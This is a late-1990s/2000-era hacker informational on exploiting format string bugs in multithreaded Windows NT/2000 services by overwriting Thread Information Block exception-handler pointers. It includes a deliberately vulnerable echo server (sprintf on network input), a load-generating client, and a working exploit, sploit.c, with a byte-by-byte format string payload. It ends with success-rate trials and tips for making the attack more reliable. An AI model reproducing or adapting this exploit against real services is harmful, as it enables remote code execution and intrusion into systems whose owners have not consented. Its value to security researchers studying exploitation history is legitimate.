0034 2001/02/25 advanced way to more reliably exploit NT format bugs remotely
==== TESO Informational =======================================================
This piece of information is to be kept confidential.
===============================================================================

Description ..........: way of getting control with format string bugs
Date .................: 2000/12/28 06:00
Author ...............: halvar
Publicity level ......: unknown
Affected .............: NT/Win32 specific
Type of entity .......: NT internals
Type of discovery ....: useful information
Severity/Importance ..: n/a
Found by .............: halvar

===============================================================================

We all know and love format string bugs. Especially on closed-source platforms,
they can still be found in large numbers. Unfortunately, the really interesting
affected programs under NT run multi-threaded, making it relatively hard to
reliably get execution under our control, as we cannot reliably overwrite
addresses on the stack. Under Win2k, a watchdog will restart the service once
it dies, so if we are first to connect to it after the restart we can reliably
guess what to overwrite. Under NT, no watchdog is around, so you have only one
shot to get control.

Now, the other choice that we have is an import table overwrite, which will not
always work either, as apparently many compilers place the import address table
inside the code section, making it a read-only page once it has been filled by
the OS. Writing to it will result in a GPF.

This informational will play around with a new cool way of getting control of
our thread by a yet-unknown technique called "TIB Exception Structure
Overwrite" (TESO) :-P.

In my last informational (0033) I described a way to walk from the pointer at
fs:[0] through the exception structures until I have found a function inside
KERNEL32.DLL. This time, I will play with structured exception handling again,
so it is a good idea to have absorbed some information from the last
informational.

Every thread that is created has a structure called "Thread Information Block"
(TIB) mapped at fs:[0]. (Some people call it "Thread Environment Block", and
the Wine project has a pretty good/slightly errant documentation of it in
thread.h.) The first DWORD of this structure is a pointer to an
__EXCEPTION_FRAME structure, which consists of two pointers: one to the next
__EXCEPTION_FRAME, and one to the function that is supposed to handle any
exception that occurs. Now, the trick is to create a fake exception handling
structure in memory and then to overwrite as many TIB entries as we can until
we trigger an exception. When that exception is triggered, our fake exception
handling structure will lead to control being transferred to the code we
pointed to in our structure.

What we have to do in our format string is:

1. Create a fake exception handling structure somewhere in memory. This
means we either have to know an address at which a pointer to a buffer we
control lies or we have to write a pointer to a buffer we control into
memory at some point.

2. Start overwriting TIBs, starting with the first thread, then the second
etc. until there are no more threads and our attempt to write to a nonpaged
(i.e. unmapped) section of memory leads to an exception.

3. The exception will transfer control to our exception handler (the buffer
we control) in which we can then execute code.

Problem Nr 1: We cannot write to any location outside of our current data
segment, so how the hell are we going to write to fs:[0]?

Answer: The TIB is mapped into the data/code segment as well, at an address
pointed to by fs:[0x18]. I ran a few tests on a few systems from NT4 SP5 up
to Win2k SP1, and there are certain regularities across all these systems
that allow us to reliably tell where the TIB of a certain thread will be in
regular memory.
The regularity in TIB allocation follows here:
The first thread of an application always has its TIB mapped at 0x7FFDE000,
and up until the 11th thread (which lies at 0x7FFD4000) we have single page
decrements from the initial value (-0x1000). Then we have a rather odd gap,
and the 12th thread's TIB will be located at 0x7FFAF000. All subsequent
threads will have their TIBs allocated sequentially with (-0x1000) difference
from here on, up until thread 250 where I stopped testing :-)

Problem Nr 2: We cannot easily write to addresses containing NULL bytes,
and we cannot assure that the location (TIB)-1 will be paged.
What can we do here?

Answer: Not much. This is one of the major drawbacks of this approach.
The problem lies in a form of memory fragmentation that occurs like this:
Several threads are created, and their TIBs are paged into the CS/DS
according to the rules outlined before. Now, some of these threads will exit
again and their respective TIB pages will be freed; this can lead to
a memory layout somewhat like this:

[0x7FFDE000 -- paged]
[0x7FFDD000 -- nonpaged]
[0x7FFDC000 -- nonpaged]
[0x7FFDB000 -- paged]
[0x7FFDA000 -- paged]
[0x7FFD9000 ... nonpaged from here on]

Now we can see that we get into trouble, as we will trigger an exception
right after having overwritten the first exception handler, without ever
touching the other two handlers we would need to overwrite.

Now the trick is that as soon as new threads are created, their TIBs are
paged into these gaps. So what we can do is create the thread that will
execute the format string bug and then, before we actually execute the
vulnerable code, create a lot of arbitrary threads, hopefully enough to
fill all gaps. We can then sequentially overwrite the exception handlers
and trigger an exception to gain control.

Problem Nr 3:
While experimenting with exception handlers for a while I found out that
apparently NT wants the pointer at fs:[0] to point somewhere between the
"stack bottom" and the "stack top" of the offending thread.
(For those interested, that validation happens in a function called
RtlDispatchException(), which is called by KiUserExceptionDispatcher().)
If the pointer points elsewhere, the user-installed exception handler will
not be called; an exception called EXCEPTION_INVALID_DISPOSITION will be
raised instead.

Answer:
Since we clearly cannot write an EXCEPTION_FRAME for each thread into its
stack region, we need a different solution. Looking at thread.h from the
WINE project, we can see that the stack_top and stack_low variables are
stored at fs:[4] and fs:[8] respectively. Now this implies that we can
easily alter the range in which our EXCEPTION_FRAME can be created. So
what we'll need to do in addition to overwriting the pointer at fs:[0] is
to overwrite the stack_top variable's high-order byte with 0x7F, thus
making sure that we pass the tests inside RtlDispatchException() and praying
that we don't fuck anything up so badly that it'll crash NT :)
The EXCEPTION_FRAME then has to be created somewhere above stack_low in
memory. For my example, I will construct it inside MSVCRT.DLL's data segment.

Here follows the code (I compiled stuff with BC++; I am not sure how stuff
looks when a different compiler works its magic, so you'll probably need
some tweaking):

---- snip ---- lameserver.c -------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

unsigned long __stdcall NewThread(void *singlearg)
{
    int sock, blah;
    char lame2[5000], lame[3000];

    sock = (int)singlearg;
    blah = recv(sock, lame, sizeof(lame)-1, 0);
    if(blah != -1)
    {
        lame[blah] = 0;                      // NUL-terminate
        sprintf(lame2, lame);                // the (deliberate) format string bug
        printf("%s\n", lame2);
        send(sock, lame2, strlen(lame2), 0); // echo only if we received something
    }

    Sleep(500);
    closesocket(sock);
    ExitThread(1);
    return 1;                                // not reached
}

int main(int argc, char **argv)
{
    WSADATA WSAdat;
    struct sockaddr_in Host;
    DWORD idThread;
    SOCKET sock1;

    WSAStartup(0x101, &WSAdat);              // Startup the sockets interface
    memset(&Host, 0, sizeof(Host));
    Host.sin_family = AF_INET;
    Host.sin_addr.s_addr = 0;
    Host.sin_port = htons(999);
    sock1 = socket(AF_INET, SOCK_STREAM, 0);
    bind(sock1, (struct sockaddr *)&Host, sizeof(struct sockaddr_in));
    listen(sock1, 0x3);                      // listen once, before the accept loop
    while(1)
    {
        printf("Waiting for connection\n");
        CreateThread(NULL, 0, &NewThread, (void *)accept(sock1, NULL, NULL), 0, &idThread);
    }
}
----- snip ---- lameserver.c EOF

The server will wait for an incoming connection and spawn a new thread for
it. For each connection the thread will read a string from the network, feed
it into sprintf() to create something format-string-buggish and then echo it
back to the client. It will then disconnect, and the thread exits.

----- snip ---- lameclient.c --------
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock.h>

#define MAX_THREAD_NORMAL 20
#define MAX_THREAD_LINGER 10

int ThreadCount = MAX_THREAD_NORMAL;
int ThreadLinger = MAX_THREAD_LINGER;

unsigned long __stdcall NewThread(void *singlearg)
{
    int sock, iLinger;
    struct sockaddr_in Host;
    unsigned long rndval;

    iLinger = 0;                        // zero the var

    if((GetTickCount() & 0xF) > 13)     // set a certain frequency for lingering
    {                                   // connections
        Sleep(0);
        if(ThreadLinger > 0)
        {
            ThreadLinger--;
            rndval = 0xFFFF;
            iLinger = 1;                // set iLinger to TRUE
        }
    }

    if(iLinger == 0)
    {
        Sleep(0);
        rndval = GetTickCount() & 0xFF;
        Sleep(0);
        rndval *= (GetTickCount() & 0x7F);
    }
    printf("[%lx] Connecting with a wait time of %lu ms -- ThreadCount is %d \n",
        (unsigned long)singlearg, rndval, MAX_THREAD_NORMAL-ThreadCount-1);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    memset(&Host, 0, sizeof(Host));
    Host.sin_family = AF_INET;
    Host.sin_addr.s_addr = 0x0100007F;  // 127.0.0.1
    Host.sin_port = htons(999);

    connect(sock, (struct sockaddr *)&Host, sizeof(Host));
    Sleep(rndval);
    printf("[%lx] Exiting...\n", (unsigned long)singlearg);
    closesocket(sock);
    ThreadCount++;
    if(iLinger)
        ThreadLinger++;

    ExitThread(0);
    return 0;                           // not reached
}

int main(int argc, char **argv)
{
    WSADATA wsaDat;
    DWORD idThread;

    idThread = 0;

    WSAStartup(0x101, &wsaDat);
    while(1)
    {
        if(ThreadCount > 0)
        {
            ThreadCount--;
            Sleep(GetTickCount() & 0x3FF);
            CreateThread(NULL, 0, &NewThread, (void *)idThread, 0, &idThread);
        }
        else
            Sleep(GetTickCount() & 0x3FFF);
    }
}
----- snip ---- lameclient.c EOF

This lame piece of crap multithreaded client will create a bunch of threads
which will connect to our lame server, keep a connection open for a certain
random time and then close the connection again. A few lingering connections
are around that take a bit longer to finish. As soon as the maximum number
of threads is reached, the client will pause for a while, letting a bunch of
threads die again. This is pretty good for simulating the memory
fragmentation that occurs when the connection count on the server is
receding. An example of fragmented memory just after the connection count
dropped from 29 to 17 is here:

001B:7FFDE000  0012FD50 00130000 0012E000 00000000  P...............
001B:7FFDD000  0538FFDC 05390000 0538F000 00000000  ..8...9...8.....
001B:7FFDC000  00E8FBF8 00E90000 00E8F000 00000000  ................
001B:7FFDB000  00F8FBF8 00F90000 00F8F000 00000000  ................
001B:7FFDA000  ???????? ???????? ???????? ????????  fragmented :-)
001B:7FFD9000  0168FBF8 01690000 0168F000 00000000  ..h...i...h.....
001B:7FFD8000  0178FBF8 01790000 0178F000 00000000  ..x...y...x.....
001B:7FFD7000  ???????? ???????? ???????? ????????  fragmented :-)
001B:7FFD6000  04C8FBF8 04C90000 04C8F000 00000000  ................
001B:7FFD5000  0398FBF8 03990000 0398F000 00000000  ................
001B:7FFD4000  0438FBF8 04390000 0438F000 00000000  ..8...9...8.....
001B:7FFAF000  ???????? ???????? ???????? ????????  fragmented :-)
001B:7FFAE000  0208FBF8 02090000 0208F000 00000000  ................
001B:7FFAD000  0218FBF8 02190000 0218F000 00000000  ................
001B:7FFAC000  ???????? ???????? ???????? ????????  fragmented :-)
001B:7FFAB000  ???????? ???????? ???????? ????????  fragmented :-)
001B:7FFAA000  0308FBF8 03090000 0308F000 00000000  ................
001B:7FFA9000  ???????? ???????? ???????? ????????  fragmented :-)
001B:7FFA8000  0318FBF8 03190000 0318F000 00000000  ................
001B:7FFA7000  ???????? ???????? ???????? ????????  fragmented :-)
001B:7FFA6000  ???????? ???????? ???????? ????????  fragmented :-)
001B:7FFA5000  04D8FBF8 04D90000 04D8F000 00000000  ................
001B:7FFA4000  ???????? ???????? ???????? ????????  fragmented :-)
001B:7FFA3000  04A8FBF8 04A90000 04A8F000 00000000  ................
001B:7FFA2000  0528FBF8 05290000 0528F000 00000000  ................
001B:7FFA1000  04B8FBF8 04B90000 04B8F000 00000000  ................

Now, what our exploit needs to do is:

1. Connect to the server to create a thread that will later send the
format string.
2. Connect to the server with a bunch more threads to fill in as many
gaps as possible to "defragment" the memory.
3. The first created thread will now start to write to the exception
handlers and then trigger an exception. In order to pass the checks that
RtlDispatchException() performs (it is called by KiUserExceptionDispatcher())
we have to overwrite the highest-order byte of the stack_top variable,
located at fs:[7], as well.

The code for this follows right here :)

---- snip --- sploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

/*
What we want to do with the format string is this:
Write 0x78038010 to location 0x78038004; then write an INT3 to 0x78038010,
then write 0x78038000 to the exception handlers until we hit an exception...
*/


unsigned char szAttackBuffer[] = {
"\x04\x80\x03\x78%12c%n " // Create ptr to our code
"\x05\x80\x03\x78%c%105c%n "
"\x06\x80\x03\x78%.f%123c%n "
"\x07\x80\x03\x78%.f%65c%n "

"\x10\x80\x03\x78%.f%76c%n%51c%.f" // Create a single 0xCC as "payload"

//--- First Thread
"\x07\xE0\xFD\x7F%123c%n%c%c " // set the stack top to 0x7F120000 ;>
"\x01\xE0\xFD\x7F%250c%n " // write 0x80 to byte 2 of xcpt frame *
"\x02\xE0\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3 of xcpt frame *
"\x03\xE0\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
"\xFD\xDF\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
//--- Second Thread
"\x07\xD0\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
"\x01\xD0\xFD\x7F%250c%n " // write 0x80 to byte 2
"\x02\xD0\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
"\x03\xD0\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
"\xFD\xCF\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
//--- Third Thread
"\x07\xC0\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
"\x01\xC0\xFD\x7F%250c%n " // write 0x80 to byte 2
"\x02\xC0\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
"\x03\xC0\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
"\xFD\xBF\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
//--- Fourth Thread
"\x07\xB0\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
"\x01\xB0\xFD\x7F%250c%n " // write 0x80 to byte 2
"\x02\xB0\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
"\x03\xB0\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
"\xFD\xAF\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
//--- Fifth Thread
"\x07\xA0\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
"\x01\xA0\xFD\x7F%250c%n " // write 0x80 to byte 2
"\x02\xA0\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
"\x03\xA0\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
"\xFD\x9F\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
//--- Sixth Thread
"\x07\x90\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
"\x01\x90\xFD\x7F%250c%n " // write 0x80 to byte 2
"\x02\x90\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
"\x03\x90\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
"\xFD\x8F\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
//--- Seventh Thread
"\x07\x80\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
"\x01\x80\xFD\x7F%250c%n " // write 0x80 to byte 2
"\x02\x80\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
"\x03\x80\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
"\xFD\x7F\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
//--- Eighth Thread
"\x07\x70\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
"\x01\x70\xFD\x7F%250c%n " // write 0x80 to byte 2
"\x02\x70\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
"\x03\x70\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
"\xFD\x6F\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
//--- Ninth Thread
"\x07\x60\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
"\x01\x60\xFD\x7F%250c%n " // write 0x80 to byte 2
"\x02\x60\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
"\x03\x60\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
"\xFD\x5F\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
//--- Tenth Thread
"\x07\x50\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
"\x01\x50\xFD\x7F%250c%n " // write 0x80 to byte 2
"\x02\x50\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
"\x03\x50\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
"\xFD\x4F\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
//--- Eleventh Thread
"\x07\x40\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
"\x01\x40\xFD\x7F%250c%n " // write 0x80 to byte 2
"\x02\x40\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
"\x03\x40\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
"\xFD\x3F\xFD\x7F%c%n%n" // write 0x00 to byte 1 and trigger xception
};

int main(int argc, char **argv)
{
    WSADATA wsaDat;
    struct sockaddr_in Host;
    int sock, socks[10], i;

    WSAStartup(0x101, &wsaDat);

    memset(&Host, 0, sizeof(Host));
    Host.sin_family = AF_INET;
    Host.sin_addr.s_addr = 0x0100007F;  // 127.0.0.1
    Host.sin_port = htons(999);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    connect(sock, (struct sockaddr *)&Host, sizeof(Host)); // create attack
                                                           // thread
    for(i = 0; i < 10; i++)             // socks[] has 10 slots: index 0..9
    {
        socks[i] = socket(AF_INET, SOCK_STREAM, 0);
        connect(socks[i], (struct sockaddr *)&Host, sizeof(Host));
    }
    Sleep(50);
    send(sock, (char *)szAttackBuffer, strlen((char *)szAttackBuffer), 0);
    return 0;
}
----- snip --- sploit.c EOF

Now, we run into a few small limitations of our compiler's sprintf() function:
apparently the runtime of BC++ will not allow us to have too long output, so
we cannot overwrite more than 10 exception handlers in the current setup.
(This number can be improved by choosing better addresses for the
EXCEPTION_FRAME structure and by optimizing the writing process where
possible.) Therefore, under really heavy load (dozens of threads active at one
time) one might want to create multiple threads which overwrite different
subsets of the TIBs at a time. This is up to the attacker's creativity; I am
not going to play through every possible situation here.

Testrun: The above examples were used for 11 trial runs (don't ask why).
(Remember, 10 of the threads in the process are _our_ threads, so the de-facto
load of the server without our intervention is the value in brackets.)

Try No #   Threads in Process   Address of thread TIB   Status
    1      19 (9)               0x7FFDD000              SUCCESS
    2      21 (11)              0x7FFDC000              SUCCESS
    3      28 (18)              0x7FFDD000              SUCCESS
    4      27 (17)              0x7FFD5000              SUCCESS
    5      18 (8)               0x7FFDD000              SUCCESS
    6      29 (19)              0x7FFA6000              FAILURE
    7      24 (14)              0x7FFDB000              SUCCESS
    8      27 (17)              0x7FFD6000              SUCCESS
    9      31 (21)              0x7FFA7000              FAILURE
   10      30 (20)              0x7FFA6000              FAILURE
   11      25 (15)              0x7FFD6000              SUCCESS

Now, for a server with a load between 8 and 21 threads (as the example
programs lameserver.c and lameclient.c create) the example exploit will yield
decent results with an exploitation reliability of about 73% (8 successes in
11 tries). Note that all three failures are runs in which the attacking
thread's TIB landed in the 0x7FFAxxxx range, i.e. beyond the pages the attack
buffer covers. (Yes, I know I need more test results to make reliable
assumptions about reliability! :)

The fun part is that this will work against any SP of NT/2k known to me and
will even work if the binaries in memory are different from those expected in
the exploit (assuming the writable area where we create the EXCEPTION_FRAME
stays writable). In fact, you have to know very little in order to have a
pretty decent probability of succeeding. But keep in mind it's only a
probability, and this is not the nice 80's style single-thread process-only
exploitation most people are used to.

Possible ways to improve the probability of success (up to the reader to
actually try out :)
1. Try to use multiple threads to overwrite a larger number of EXCEPTION_FRAME
pointers, keeping each thread alive afterwards.
2. The worse the memory is fragmented, the better our chances to get our main
exploiting thread to be among the first 10 in memory. So creating memory
fragmentation works for us -- try creating a heavy server load with 30-40
threads, then let them all die quickly. Connect immediately afterwards with
the main exploiting thread.

Ok, Tuesday night, 3 o'clock in the morning. Time for bed. Stay tooned for my
next informational presenting yet another leeto Win32 fmt bug exploitation
technique: UEFA (Unhandled Exception Filter Attack) :)

===============================================================================